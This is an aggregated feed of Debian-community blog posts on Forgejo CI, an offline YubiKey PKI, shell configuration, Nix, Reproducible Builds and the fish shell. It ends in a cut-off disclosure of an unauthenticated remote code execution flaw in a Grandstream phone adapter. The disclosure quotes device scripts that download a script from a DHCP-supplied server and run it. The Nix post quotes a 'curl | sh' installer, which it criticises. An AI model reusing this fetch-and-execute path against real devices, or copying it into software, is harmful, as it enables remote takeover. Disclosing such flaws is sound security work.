The mirror workflow creates a configuration file by replacing the value of the REGISTRY environment variable (computed by removing the protocol from the server_url), the REGISTRY_USER organization variable and the REGISTRY_PASS secret using the envsubst command, and then runs the regsync tool to mirror the images using that configuration file. The action is configured to run daily, on push events when the regsync.envsubst.yml file is modified on the main branch, and it can also be triggered manually. The source code of the action is as follows:
.forgejo/workflows/mirror.yaml
name: mirror
on:
  schedule:
    - cron: '@daily'
  push:
    branches:
      - main
    paths:
      - 'regsync.envsubst.yml'
  workflow_dispatch:
jobs:
  mirror:
    if: ${{ vars.REGISTRY_USER != '' && secrets.REGISTRY_PASS != '' }}
    runs-on: docker
    container:
      image: forgejo.mixinet.net/oci/node-mixinet:latest
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Sync images
        run: |
          REGISTRY="$(echo "${{ github.server_url }}" | sed -e 's%https://%%')" \
          REGISTRY_USER="${{ vars.REGISTRY_USER }}" \
          REGISTRY_PASS="${{ secrets.REGISTRY_PASS }}" \
            envsubst <regsync.envsubst.yml >.regsync.yml
          regsync --config .regsync.yml once
          rm -f .regsync.yml

Conclusion
We have installed a forgejo-runner and configured it to run actions for our own server and things are working fine. This approach allows us to have a powerful CI/CD system on a modest home server, something very useful for maintaining personal projects and playing with things without needing SaaS platforms like github or gitlab.

Vincent Bernat: Offline PKI using 3 YubiKeys and an ARM single board computer

An offline PKI enhances security by physically isolating the certificate authority from network threats. A YubiKey is a low-cost solution to store a root certificate. You also need an air-gapped environment to operate the root CA.
PKI relying on a set of 3 YubiKeys: 2 for the root CA and 1 for the intermediate CA.
Offline PKI backed up by 3 YubiKeys
This post describes an offline PKI system using the following components: It is possible to add more YubiKeys as a backup of the root CA if needed. This is not needed for the intermediate CA as you can generate a new one if the current one gets destroyed.

The software part
offline-pki is a small Python application to manage an offline PKI. It relies on yubikey-manager to manage YubiKeys and cryptography for cryptographic operations not executed on the YubiKeys. The application has some opinionated design choices. Notably, the cryptography is hard-coded to use the NIST P-384 elliptic curve. The first step is to reset all your YubiKeys:
$ offline-pki yubikey reset
This will reset the connected YubiKey. Are you sure? [y/N]: y
New PIN code:
Repeat for confirmation:
New PUK code:
Repeat for confirmation:
New management key ('.' to generate a random one):
WARNING[pki-yubikey] Using random management key: e8ffdce07a4e3bd5c0d803aa3948a9c36cfb86ed5a2d5cf533e97b088ae9e629
INFO[pki-yubikey]  0: Yubico YubiKey OTP+FIDO+CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[yubikit.management] Device config written
INFO[yubikit.piv] PIV application data reset performed
INFO[yubikit.piv] Management key set
INFO[yubikit.piv] New PUK set
INFO[yubikit.piv] New PIN set
INFO[pki-yubikey] YubiKey reset successful!
Then, generate the root CA and create as many copies as you want:
$ offline-pki certificate root --permitted example.com
Management key for Root X:
Plug YubiKey "Root X"...
INFO[pki-yubikey]  0: Yubico YubiKey CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[yubikit.piv] Data written to object slot 0x5fc10a
INFO[yubikit.piv] Certificate written to slot 9C (SIGNATURE), compression=True
INFO[yubikit.piv] Private key imported in slot 9C (SIGNATURE) of type ECCP384
Copy root certificate to another YubiKey? [y/N]: y
Plug YubiKey "Root X"...
INFO[pki-yubikey]  0: Yubico YubiKey CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[yubikit.piv] Data written to object slot 0x5fc10a
INFO[yubikit.piv] Certificate written to slot 9C (SIGNATURE), compression=True
INFO[yubikit.piv] Private key imported in slot 9C (SIGNATURE) of type ECCP384
Copy root certificate to another YubiKey? [y/N]: n
You can inspect the result:
$ offline-pki yubikey info
INFO[pki-yubikey]  0: Yubico YubiKey CCID 00 00
INFO[pki-yubikey] SN: 23854514
INFO[pki-yubikey] Slot 9C (SIGNATURE):
INFO[pki-yubikey]   Private key type: ECCP384
INFO[pki-yubikey]   Public key:
INFO[pki-yubikey]     Algorithm:  secp384r1
INFO[pki-yubikey]     Issuer:     CN=Root CA
INFO[pki-yubikey]     Subject:    CN=Root CA
INFO[pki-yubikey]     Serial:     1
INFO[pki-yubikey]     Not before: 2024-07-05T18:17:19+00:00
INFO[pki-yubikey]     Not after:  2044-06-30T18:17:19+00:00
INFO[pki-yubikey]     PEM:
-----BEGIN CERTIFICATE-----
MIIBcjCB+aADAgECAgEBMAoGCCqGSM49BAMDMBIxEDAOBgNVBAMMB1Jvb3QgQ0Ew
HhcNMjQwNzA1MTgxNzE5WhcNNDQwNjMwMTgxNzE5WjASMRAwDgYDVQQDDAdSb290
IENBMHYwEAYHKoZIzj0CAQYFK4EEACIDYgAERg3Vir6cpEtB8Vgo5cAyBTkku/4w
kXvhWlYZysz7+YzTcxIInZV6mpw61o8W+XbxZV6H6+3YHsr/IeigkK04/HJPi6+i
zU5WJHeBJMqjj2No54Nsx6ep4OtNBMa/7T9foyMwITAPBgNVHRMBAf8EBTADAQH/
MA4GA1UdDwEB/wQEAwIBhjAKBggqhkjOPQQDAwNoADBlAjEAwYKy/L8leJyiZSnn
xrY8xv8wkB9HL2TEAI6fC7gNc2bsISKFwMkyAwg+mKFKN2w7AjBRCtZKg4DZ2iUo
6c0BTXC9a3/28V5aydZj6rvx0JqbF/Ln5+RQL6wFMLoPIvCIiCU=
-----END CERTIFICATE-----
Then, you can create an intermediate certificate with offline-pki yubikey intermediate and use it to sign certificates by providing a CSR to offline-pki certificate sign. Be careful and inspect the CSR before signing it, as only the subject name can be overridden. Check the documentation for more details. Get the available options using the --help flag.

The hardware part
To ensure the operations on the root and intermediate CAs are air-gapped, a cost-efficient solution is to use an ARM64 single board computer. The Libre Computer Sweet Potato SBC is a more open alternative to the well-known Raspberry Pi.1
Libre Computer Sweet Potato single board computer relying on the Amlogic S905X SOC
Libre Computer Sweet Potato SBC, powered by the AML-S905X SOC
I interact with it through a USB-to-TTL UART converter:
$ tio /dev/ttyUSB0
[16:40:44.546] tio v3.7
[16:40:44.546] Press ctrl-t q to quit
[16:40:44.555] Connected to /dev/ttyUSB0
GXL:BL1:9ac50e:bb16dc;FEAT:ADFC318C:0;POC:1;RCY:0;SPI:0;0.0;CHK:0;
TE: 36574
BL2 Built : 15:21:18, Aug 28 2019. gxl g1bf2b53 - luan.yuan@droid15-sz
set vcck to 1120 mv
set vddee to 1000 mv
Board ID = 4
CPU clk: 1200MHz
[ ]

The Nix glue
To bring everything together, I am using Nix with a Flake providing:
  • a package for the offline-pki application, with shell completion,
  • a development shell, including an editable version of the offline-pki application,
  • a NixOS module to setup the offline PKI, resetting the system at each boot,
  • a QEMU image for testing, and
  • an SD card image to be used on the Sweet Potato or another ARM64 SBC.
# Execute the application locally
nix run github:vincentbernat/offline-pki -- --help
# Run the application inside a QEMU VM
nix run github:vincentbernat/offline-pki\#qemu
# Build a SD card for the Sweet Potato or for the Raspberry Pi
nix build --system aarch64-linux github:vincentbernat/offline-pki\#sdcard.potato
nix build --system aarch64-linux github:vincentbernat/offline-pki\#sdcard.generic
# Get a development shell with the application
nix develop github:vincentbernat/offline-pki

  1. The key for the root CA is not generated by the YubiKey. Using an air-gapped computer is all the more important. Put it in a safe with the YubiKeys when done!

8 March 2025

Vincent Bernat: Auto-expanding aliases in Zsh

To avoid needless typing, the fish shell features command abbreviations to expand some words after pressing space. We can emulate such a feature with Zsh:
# Definition of abbrev-alias for auto-expanding aliases
typeset -ga _vbe_abbrevations
abbrev-alias() {
    alias $1
    _vbe_abbrevations+=(${1%%\=*})
}
_vbe_zle-autoexpand() {
    local -a words; words=(${(z)LBUFFER})
    if (( ${#_vbe_abbrevations[(r)${words[-1]}]} )); then
        zle _expand_alias
    fi
    zle magic-space
}
zle -N _vbe_zle-autoexpand
bindkey -M emacs " " _vbe_zle-autoexpand
bindkey -M isearch " " magic-space
# Correct common typos
(( $+commands[git] )) && abbrev-alias gti=git
(( $+commands[grep] )) && abbrev-alias grpe=grep
(( $+commands[sudo] )) && abbrev-alias suod=sudo
(( $+commands[ssh] )) && abbrev-alias shs=ssh
# Save a few keystrokes
(( $+commands[git] )) && abbrev-alias gls="git ls-files"
(( $+commands[ip] )) && {
  abbrev-alias ip6='ip -6'
  abbrev-alias ipb='ip -brief'
}
# Hard to remember options
(( $+commands[mtr] )) && abbrev-alias mtrr='mtr -wzbe'
Here is a demo where gls is expanded to git ls-files after pressing space:
Auto-expanding gls to git ls-files
I don't auto-expand all aliases. I keep using regular aliases when slightly modifying the behavior of a command or for well-known abbreviations:
alias df='df -h'
alias du='du -h'
alias rm='rm -i'
alias mv='mv -i'
alias ll='ls -ltrhA'

6 March 2025

Antoine Beaupré: Nix Notes

Meta
In case you haven't noticed, I'm trying to post and one of the things that entails is to just dump over the fence a bunch of draft notes. In this specific case, I had a set of rough notes about NixOS and particularly Nix, the package manager. In this case, you can see the very birth of an article, what it looks like before it becomes the questionable prose it is now, by looking at the Git history of this file, particularly its birth. I have a couple of those left, and it would be pretty easy to publish them as is, but I feel I'd be doing others (and myself! I write for my own documentation too after all) a disservice by not going the extra mile on those. So here's the long version of my experiment with Nix.

Nix
A couple friends are real fans of Nix. Just like I work with Puppet a lot, they deploy and maintain servers (if not fleets of servers) with NixOS and its declarative package management system. Essentially, they use it as a configuration management system, which is pretty awesome. That, however, is a bit too high of a bar for me. I rarely try new operating systems these days: I'm a Debian developer and it takes most of my time to keep that functional. I'm not going to go around messing with other systems as I know that would inevitably get me dragged down into contributing into yet another free software project. I'm mature now and know where to draw the line. Right? So I'm just testing Nix, the package manager, on Debian, because I learned from my friend that nixpkgs is the largest package repository out there, a mind-boggling 100,000 at the time of writing (with 88% of packages up to date), compared to around 40,000 in Debian (or 72,000 if you count binary packages, with 72% up to date). I naively thought Debian was the largest, perhaps competing with Arch, and I was wrong: Arch is larger than Debian too. What brought me there is I wanted to run Harper, a fast spell-checker written in Rust. The logic behind using Nix instead of just downloading the source and running it myself is that I delegate the work of supply-chain integrity checking to a distributor, a bit like you trust Debian developers like myself to package things in a sane way. I know this widens the attack surface to a third party of course, but the rationale is that I shift cryptographic verification to another stack than just "TLS + GitHub" (although that is somewhat still involved) that's linked with my current chain (Debian packages). I have since then stopped using Harper for various reasons and also wrapped up my Nix experiment, but felt it worthwhile to jot down some observations on the project.

Hot take
Overall, Nix is hard to get into, with a complicated learning curve. I have found the documentation to be a bit confusing, since there are many ways to do certain things. I particularly tripped on "flakes" and, frankly, incomprehensible error reporting. It didn't help that I tried to run nixpkgs on Debian, which is technically possible, but you can tell that I'm not supposed to be doing this. My friend who reviewed this article expressed surprise at how easy this was, but then he only saw the finished result, not me tearing my hair out to make this actually work.

Nix on Debian primer
So here's how I got started. First I installed the nix binary package:
apt install nix-bin
Then I had to add myself to the right group and logout/log back in to get the rights to deploy Nix packages:
adduser anarcat nix-users
That wasn't easy to find, but is mentioned in the README.Debian file shipped with the Debian package. Then, I didn't write this down, but the README.Debian file above mentions it, so I think I added a "channel" like this:
nix-channel --add https://nixos.org/channels/nixpkgs-unstable nixpkgs
nix-channel --update
And I likely installed the Harper package with:
nix-env --install harper
At this point, harper was installed in a ... profile? Not sure. I had to add ~/.nix-profile/bin (a symlink to /nix/store/sympqw0zyybxqzz6fzhv03lyivqqrq92-harper-0.10.0/bin) to my $PATH environment for this to actually work.
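In practice that meant something like the following line in a shell profile (a minimal sketch for a single-user setup):
# Make binaries installed with nix-env available in interactive shells
export PATH="$HOME/.nix-profile/bin:$PATH"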

Side notes on documentation
Those last two commands (nix-channel and nix-env) were hard to figure out, which is kind of amazing because you'd think a tutorial on Nix would feature something like this prominently. But three different tutorials failed to bring me up to that basic setup; even the README.Debian didn't spell that out clearly. The tutorials all show me how to develop packages for Nix, not plainly how to install Nix software. This is presumably because "I'm doing it wrong": you shouldn't just "install a package", you should set up an environment declaratively and tell it what you want to do. But here's the thing: I didn't want to "do the right thing". I just wanted to install Harper, and documentation failed to bring me to that basic "hello world" stage. Here's what one of the tutorials suggests as a first step, for example:
curl -L https://nixos.org/nix/install | sh
nix-shell --packages cowsay lolcat
nix-collect-garbage
... which, when you follow through, leaves you with almost precisely nothing left installed (apart from Nix itself, set up with a nasty "curl pipe bash"). So while that works in testing Nix, you're not much better off than when you started.

Rolling back everything
Now that I have stopped using Harper, I don't need Nix anymore, which I'm sure my Nix friends will be sad to read about. Don't worry, I have notes now, and can try again! But still, I wanted to clear things out, so I did this, as root:
deluser anarcat nix-users
apt purge nix-bin
rm -rf /nix ~/.nix*
I think this cleared things out, but I'm not actually sure.

Side note on Nix drama
This blurb wouldn't be complete without a mention that the Nix community has been somewhat tainted by the behavior of its founder. I won't bother you too much with this; LWN covered it well in 2024, and made a followup article about spinoffs and forks that's worth reading as well. I did want to say that everyone I have been in contact with in the Nix community was absolutely fantastic. So I am really sad that the behavior of a single individual can pollute a community in such a way. As a leader, if you have but one responsibility, it's to behave properly for people around you. It's actually really, really hard to do that, because yes, it means you need to act differently than others and no, you just don't get to be upset at others like you would normally do with friends, because you're in a position of authority. It's a lesson I'm still learning myself, to be fair. But at least I don't work with arms manufacturers or, if I would, I would be sure as hell to accept the nick (or nix?) on the chin when people would get upset, and try to make amends. So long live the Nix people! I hope the community recovers from that dark moment; so far it seems like it will. And thanks for helping me test Harper!

5 March 2025

Reproducible Builds: Reproducible Builds in February 2025

Welcome to the second report in 2025 from the Reproducible Builds project. Our monthly reports outline what we've been up to over the past month, and highlight items of news from elsewhere in the increasingly-important area of software supply-chain security. As usual, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. Reproducible Builds at FOSDEM 2025
  2. Reproducible Builds at PyCascades 2025
  3. Does Functional Package Management Enable Reproducible Builds at Scale?
  4. reproduce.debian.net updates
  5. Upstream patches
  6. Distribution work
  7. diffoscope & strip-nondeterminism
  8. Website updates
  9. Reproducibility testing framework

Reproducible Builds at FOSDEM 2025
Similar to last year's event, there was considerable activity regarding Reproducible Builds at FOSDEM 2025, held on 1st and 2nd February this year in Brussels, Belgium. We count at least four talks related to reproducible builds. (You can also read our news report from last year's event in which Holger Levsen presented in the main track.)
Jelle van der Waa, Holger Levsen and kpcyrd presented in the Distributions track on A Tale of several distros joining forces for a common goal. In this talk, three developers from two different Linux distributions (Arch Linux and Debian), discuss this goal which is, of course, reproducible builds. The presenters discuss both what is shared and different between the two efforts, touching on the history and future challenges alike. The slides of this talk are available to view, as is the full video (30m02s). The talk was also discussed on Hacker News.
Zbigniew Jędrzejewski-Szmek presented in the ever-popular Python track on Rewriting .pyc files for fun and reproducibility, i.e. the bytecode files generated by Python in order to speed up module imports: It's been known for a while that those are not reproducible: on different architectures, the bytecode for exactly the same sources ends up slightly different. The slides of this talk are available, as is the full video (28m32s).
In the Nix and NixOS track, Julien Malka presented on the Saturday asking How reproducible is NixOS: We know that the NixOS ISO image is very close to being perfectly reproducible thanks to reproducible.nixos.org, but there doesn't exist any monitoring of Nixpkgs as a whole. In this talk I'll present the findings of a project that evaluated the reproducibility of Nixpkgs as a whole by mass rebuilding packages from revisions between 2017 and 2023 and comparing the results with the NixOS cache. Unfortunately, no video of the talk is available, but there is a blog and article on the results.
Lastly, Simon Tournier presented in the Open Research track on the confluence of GNU Guix and Software Heritage: Source Code Archiving to the Rescue of Reproducible Deployment. Simon's talk describes the design and implementation we came up with and reports on the archival coverage for package source code with data collected over five years. It opens to some remaining challenges toward a better open and reproducible research. The slides for the talk are available, as is the full video (23m17s).

Reproducible Builds at PyCascades 2025
Vagrant Cascadian presented at this year's PyCascades conference, which was held on February 8th and 9th in Portland, OR, USA. PyCascades is a regional instance of PyCon held in the Pacific Northwest. Vagrant's talk, entitled Re-Py-Ducible Builds, caught the audience's attention with the following abstract:
Crank your Python best practices up to 11 with Reproducible Builds! This talk will explore Reproducible Builds by highlighting issues identified in Python projects, from the simple to the seemingly inscrutable. Reproducible Builds is basically the crazy idea that when you build something, and you build it again, you get the exact same thing or even more important, if someone else builds it, they get the exact same thing too.
More info is available on the talk's page.

Does Functional Package Management Enable Reproducible Builds at Scale?
On our mailing list last month, Julien Malka, Stefano Zacchiroli and Théo Zimmermann of Télécom Paris' in-house research laboratory, the Information Processing and Communications Laboratory (LTCI), announced that they had published an article asking the question: Does Functional Package Management Enable Reproducible Builds at Scale? (PDF). This month, however, Ludovic Courtès followed up to the original announcement on our mailing list mentioning, amongst other things, the Guix Data Service and how it shows the reproducibility of GNU Guix over time, as described in a GNU Guix blog post back in March 2024.

reproduce.debian.net updates The last few months have seen the introduction of reproduce.debian.net. Announced first at the recent Debian MiniDebConf in Toulouse, reproduce.debian.net is an instance of rebuilderd operated by the Reproducible Builds project. Powering this work is rebuilderd, our server which monitors the official package repositories of Linux distributions and attempts to reproduce the observed results there. This month, however, Holger Levsen:
  • Split packages that are not specific to any architecture away from amd64.reproducible.debian.net service into a new all.reproducible.debian.net page.
  • Increased the number of riscv64 nodes to a total of 4, and added a new amd64 node thanks to our (now 10-year) sponsor, IONOS.
  • Discovered an issue in the Debian build service where some new incoming build-dependencies do not end up historically archived.
  • Uploaded the devscripts package, incorporating changes from Jochen Sprickerhof to the debrebuild script specifically to fix the handling of the Rules-Requires-Root header in Debian source packages.
  • Uploaded a number of Rust dependencies of rebuilderd (rust-libbz2-rs-sys, rust-actix-web, rust-actix-server, rust-actix-http, rust-actix-web-codegen and rust-time-tz) after they were prepared by kpcyrd:
Jochen Sprickerhof also updated the sbuild package to:
  • Obey requests from the user/developer for a different temporary directory.
  • Use the root/superuser for some values of Rules-Requires-Root.
  • Don't pass --root-owner-group to old versions of dpkg.
and additionally requested that many Debian packages are rebuilt by the build servers in order to work around bugs found on reproduce.debian.net. [ ][ ][ ]
Lastly, kpcyrd has also worked towards getting rebuilderd packaged in NixOS, and Jelle van der Waa picked up the existing pull request for Fedora support within rebuilderd and made it work with the existing Koji rebuilderd script. The server is being packaged for Fedora in an unofficial copr repository, and will be in the official repositories once all the dependencies are packaged.

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

Distribution work There has been the usual work in various distributions this month, such as: In Debian, 17 reviews of Debian packages were added, 6 were updated and 8 were removed this month, adding to our knowledge about identified issues.
Fedora developers Davide Cavalca and Zbigniew Jędrzejewski-Szmek gave a talk on Reproducible Builds in Fedora (PDF), touching on SRPM-specific issues as well as the current status and future plans.
Thanks to an investment from the Sovereign Tech Agency, the FreeBSD project s work on unprivileged and reproducible builds continued this month. Notable fixes include:
The Yocto Project has been struggling to upgrade to the latest Go and Rust releases due to reproducibility problems in the newer versions. Hongxu Jia tracked down the issue with Go which meant that the project could upgrade from the 1.22 series to 1.24, with the fix being submitted upstream for review (see above). For Rust, however, the project was significantly behind, but has made recent progress after finally identifying the blocking reproducibility issues. At time of writing, the project is at Rust version 1.82, with patches under review for 1.83 and 1.84 and fixes being discussed with the Rust developers. The project hopes to improve the tests for reproducibility in the Rust project itself in order to try and avoid future regressions. Yocto continues to maintain its ability to binary reproduce all of the recipes in OpenEmbedded-Core, regardless of the build host distribution or the current build path.
Finally, Douglas DeMaio published an article on the openSUSE blog announcing that the Reproducible-openSUSE (RBOS) Project Hits [Significant] Milestone. In particular:
The Reproducible-openSUSE (RBOS) project, which is a proof-of-concept fork of openSUSE, has reached a significant milestone after demonstrating a usable Linux distribution can be built with 100% bit-identical packages.
This news was also announced on our mailing list by Bernhard M. Wiedemann, who also published another report for openSUSE as well.

diffoscope & strip-nondeterminism diffoscope is our in-depth and content-aware diff utility that can locate and diagnose reproducibility issues. This month, Chris Lamb made the following changes, including preparing and uploading versions 288 and 289 to Debian:
  • Add asar to DIFFOSCOPE_FAIL_TESTS_ON_MISSING_TOOLS in order to address Debian bug #1095057. [ ]
  • Catch a CalledProcessError when calling html2text. [ ]
  • Update the minimal Black version. [ ]
Additionally, Vagrant Cascadian updated diffoscope in GNU Guix to version 287 [ ][ ] and 288 [ ][ ] as well as submitted a patch to update to 289 [ ]. Vagrant also fixed an issue that was breaking reprotest on Guix [ ][ ]. strip-nondeterminism is our sister tool to remove specific non-deterministic results from a completed build. This month version 1.14.1-2 was uploaded to Debian unstable by Holger Levsen.
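As a brief usage sketch (the package file names here are hypothetical), comparing two builds of the same package with diffoscope and normalising a build with strip-nondeterminism looks more or less like this:
# Compare two builds of the same package and write an HTML report:
diffoscope --html report.html package_1.0-1_amd64.deb package_1.0-1_amd64.rebuild.deb
# strip-nondeterminism can then remove known sources of non-determinism in place:
strip-nondeterminism package_1.0-1_amd64.deb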

Website updates There were a large number of improvements made to our website this month, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In January, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add a helper script to manually schedule packages. [ ][ ][ ][ ][ ]
    • Fix a link in the website footer. [ ]
    • Strip the emojis from package names on the manual rebuilder in order to ease copy-and-paste. [ ]
    • On the various statistics pages, provide the number of affected source packages [ ][ ] as well as provide various totals [ ][ ].
    • Fix graph labels for the various architectures [ ][ ] and make them clickable too [ ][ ][ ].
    • Break the displayed HTML in blocks of 256 packages in order to address rendering issues. [ ][ ]
    • Add monitoring jobs for riscv64 architecture nodes and integrate them elsewhere in our infrastructure. [ ][ ]
    • Add riscv64 architecture nodes. [ ][ ][ ][ ][ ]
    • Update much of the documentation. [ ][ ][ ]
    • Make a number of improvements to the layout and style. [ ][ ][ ][ ][ ][ ][ ]
    • Remove direct links to JSON and database backups. [ ]
    • Drop a Blues Brothers reference from frontpage. [ ]
  • Debian-related:
    • Deal with /boot/vmlinuz* being called vmlinux* on the riscv64 architecture. [ ]
    • Add a new ionos17 node. [ ][ ][ ][ ][ ]
    • Install debian-repro-status on all Debian trixie and unstable jobs. [ ]
  • FreeBSD-related:
    • Switch to running the latest branch of FreeBSD. [ ]
  • Misc:
    • Fix /etc/cron.d and /etc/logrotate.d permissions for Jenkins nodes. [ ]
    • Add support for riscv64 architecture nodes. [ ][ ]
    • Grant Jochen Sprickerhof access to the o4 node. [ ]
    • Disable the janitor-setup-worker. [ ][ ]
In addition:
  • kpcyrd fixed the /all/api/ API endpoints on reproduce.debian.net by altering the nginx configuration. [ ]
  • James Addison updated reproduce.debian.net to display the so-called bad reasons hyperlink inline [ ] and merged the Categorized issues links into the Reproduced builds column [ ].
  • Jochen Sprickerhof also made some reproduce.debian.net-related changes, adding support for detecting a bug in the mmdebstrap package [ ] as well as updating some documentation [ ].
  • Roland Clobus continued their work on reproducible live images for Debian, making changes related to new clustering of jobs in openQA. [ ]
And finally, both Holger Levsen [ ][ ][ ] and Vagrant Cascadian performed significant node maintenance. [ ][ ][ ][ ][ ]
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. You can also get in touch with us via:

1 March 2025

Guido Günther: Free Software Activities February 2025

Another short status update of what happened on my side last month. The larger blocks were the Phosh 0.45 release; reviews also took a considerable amount of time. On the fun side, debugging bananui and coming up with a fix in phoc, as well as setting up a small GSM network using osmocom to test more Cell Broadcast thingies, were likely the most fun parts. phosh phoc phosh-osk-stub phosh-tour phosh-mobile-settings pfs libphosh-rs meta-phosh libcmatrix Debian gmobile feedbackd grim Wayland protocols g4music wlroots qbootctl bananui-shell libssc ModemManager Waycheck Bug reports Reviews This is not code by me but reviews on other people's code. The list is slightly incomplete. Thanks for the contributions! Help Development If you want to support my work see donations. Comments? Join the Fediverse thread

28 February 2025

Antoine Beaupré: testing the fish shell

I have been testing fish for a couple months now (this file started on 2025-01-03T23:52:15-0500 according to stat(1)), and those are my notes. I suspect people will have Opinions about my comments here. Do not comment unless you have some Constructive feedback to provide: I don't want to know if you think I am holding it Wrong. Consider that I might have used UNIX shells for longer than you have lived. I'm not sure I'll keep using fish, but so far it's the first shell that survived heavy use outside of zsh(1) (unless you count tcsh(1), but that was in another millennium). My normal shell is bash(1), and it's still the shell I use everywhere other than my laptop, as I haven't switched on all the servers I manage, although it is available since August 2022 on torproject.org servers. I first got interested in fish because they ported it to Rust, making it one of the rare shells out there written in a "safe" and modern programming language, released after an impressive ~2 years of work with Fish 4.0.

Cool things Current directory gets shortened, ~/wikis/anarc.at/software/desktop/wayland shows up as ~/w/a/s/d/wayland Autocompletion rocks. Default prompt rocks. Doesn't seem vulnerable to command injection assaults, at least it doesn't trip on the git-landmine. It even includes pipe status output, which was a huge pain to implement in bash. Made me realize that if the last command succeeds, we don't see other failures, which is the case with my current prompt anyway! Signal reporting is better than my bash implementation too. So far the only modification I have made to the prompt is to add a printf '\a' to output a bell. By default, fish keeps a directory history (but separate from the pushd stack), that can be navigated with cdh, prevd, and nextd; dirh shows the history.

Less cool I feel there's visible latency in the prompt creation. POSIX-style functions (foo() { true; }) are unsupported. Instead, fish uses whitespace-sensitive definitions like this:
function foo
    true
end
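As a concrete (made-up) example of that porting work, here is a small POSIX helper rewritten with the function syntax above, plus the alias workaround mentioned below; the helper name and body are invented for illustration:
# POSIX shell version:
#   mkcd() { mkdir -p "$1" && cd "$1"; }
# fish version, using $argv instead of positional parameters:
function mkcd
    mkdir -p $argv[1]
    and cd $argv[1]
end
# trivial wrappers can instead be declared as aliases (fish implements them as functions):
alias ll='ls -l'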
This means my (modest) collection of POSIX functions needs to be ported to fish. Workaround: simple functions can be turned into aliases, which fish supports (but implements using functions). EOF heredocs are considered to be "minor syntactic sugar". I find them frigging useful. Process substitution is split on newlines, not whitespace. You need to pipe through string split -n " " to get the equivalent. <(cmd) doesn't exist: they claim you can use cmd | foo - as a replacement, but that's not correct: I used <(cmd) mostly where foo does not support - as a magic character to say 'read from stdin'. Documentation is... limited. It seems mostly geared towards the web docs which are... okay (but I couldn't find out about ~/.config/fish/conf.d there!), but this is really inconvenient when you're trying to browse the manual pages. For example, fish thinks there's a fish_prompt manual page, according to its own completion mechanism, but man(1) cannot find that manual page. I can't find the manual for the time command (which is actually a keyword!) Fish renders multi-line commands with newlines. So if your terminal looks like this, say:
anarcat@angela:~> sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
... but it's actually one line, when you copy-paste the above, in foot(1), it will show up exactly like this, newlines and all:
sq keyring merge torproject-keyring/lavamind-
95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyrin
g/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Whereas it should show up like this:
sq keyring merge torproject-keyring/lavamind-95F341D746CF1FC8B05A0ED5D3F900749268E55E.gpg torproject-keyring/weasel-E3ED482E44A53F5BBE585032D50F9EBC09E69937.gpg | wl-copy
Note that this is an issue specific to foot(1), alacritty(1) and gnome-terminal(1) don't suffer from that issue. I have already filed it upstream in foot and it is apparently fixed already. Globbing is driving me nuts. You can't pass a * to a command unless fish agrees it's going to match something. You need to escape it if it doesn't immediately match, and then you need the called command to actually support globbing. 202[345] doesn't match folders named 2023, 2024, 2025, it will send the string 202[345] to the command.

Blockers () is like $(): it's process substitution, and not a subshell. This is really impractical: I use ( cd foo ; do_something) all the time to avoid losing the current directory... I guess I'm supposed to use pushd for this, but ouch. This wouldn't be so bad if it was just for cd though. Clean constructs like this:
( git grep -l '^#!/.*bin/python' ; fdfind .py ) | sort -u
Turn into what i find rather horrible:
begin; git grep -l '^#!/.*bin/python' ; fdfind .py ; end | sort -u
It... works, but it goes back to "oh dear, now there's a new language again". I only found out about this construct while trying:
{ git grep -l '^#!/.*bin/python' ; fdfind .py } | sort -u
... which fails and suggests using begin/end, at which point: why not just support the curly braces? FOO=bar is not allowed. It's actually recognized syntax, but creates a warning. We're supposed to use set foo bar instead. This really feels like a needless divergence from the standard. Aliases are... peculiar. Typical constructs like alias mv="\mv -i" don't work because fish treats aliases as a function definition, and \ is not magical there. This can be worked around by specifying the full path to the command, with e.g. alias mv="/bin/mv -i". Another problem is trying to override a built-in, which seems completely impossible. In my case, I like the time(1) command the way it is, thank you very much, and fish provides no way to bypass that builtin. It is possible to call time(1) with command time, but it's not possible to replace the command keyword so that means a lot of typing. Again: you can't use \ to bypass aliases. This is a huge annoyance for me. I would need to learn to type command in long form, and I use that stuff pretty regularly. I guess I could alias command to c or something, but this is one of those huge muscle memory challenges. Alt-. doesn't always work the way I expect.

20 February 2025

Evgeni Golov: Unauthenticated RCE in Grandstream HT802V2 and probably others using gs_test_server DHCP vendor option

The Grandstream HT802V2 uses busybox' udhcpc for DHCP. When a DHCP event occurs, udhcpc calls a script (/usr/share/udhcpc/default.script by default) to further process the received data. On the HT802V2 this is used to (among others) parse the data in DHCP option 43 (vendor) using the Grandstream-specific parser /sbin/parse_vendor.
 
[ -n "$vendor" ] && {
        VENDOR_TEST_SERVER="`echo $vendor | parse_vendor | grep gs_test_server | cut -d' ' -f2`"
        if [ -n "$VENDOR_TEST_SERVER" ]; then
                /app/bin/vendor_test_suite.sh $VENDOR_TEST_SERVER
        fi
}
 
According to the documentation the format is <option_code><value_length><value>. The only documented option code is 0x01 for the ACS URL. However, if you pass other codes, these are accepted and parsed too. Especially, if you pass 0x05 you get gs_test_server, which is passed in a call to /app/bin/vendor_test_suite.sh. What's /app/bin/vendor_test_suite.sh? It's this nice script:
#!/bin/sh
TEST_SCRIPT=vendor_test.sh
TEST_SERVER=$1
TEST_SERVER_PORT=8080
cd /tmp
wget -q -t 2 -T 5 http://${TEST_SERVER}:${TEST_SERVER_PORT}/${TEST_SCRIPT}
if [ "$?" = "0" ]; then
    echo "Finished downloading ${TEST_SCRIPT} from http://${TEST_SERVER}:${TEST_SERVER_PORT}"
    chmod +x ${TEST_SCRIPT}
        corefile_dec ${TEST_SCRIPT}
